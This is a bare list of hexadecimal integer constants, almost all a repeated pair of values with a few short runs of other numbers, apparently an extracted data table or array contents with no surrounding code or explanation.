0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000004, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000C, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000014, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x0000001C, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000006, 0x00000021, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000004, 0x00000009, 0x00000003, 0x000002B1, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000005, 0x0000000B, 0x00000006, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000D, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000015, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x0000001D, 0x0000000B, 0x00000006, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x00000190, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000006, 0x0000000B, 0x00000001, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000E, 0x0000000B, 0x00000000, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000016, 0x0000000B, 0x00000004, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x0000001E, 0x0000000B, 0x00000002, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000006, 0x00000022, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000004, 0x00000009, 0x00000003, 0x000001F4, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 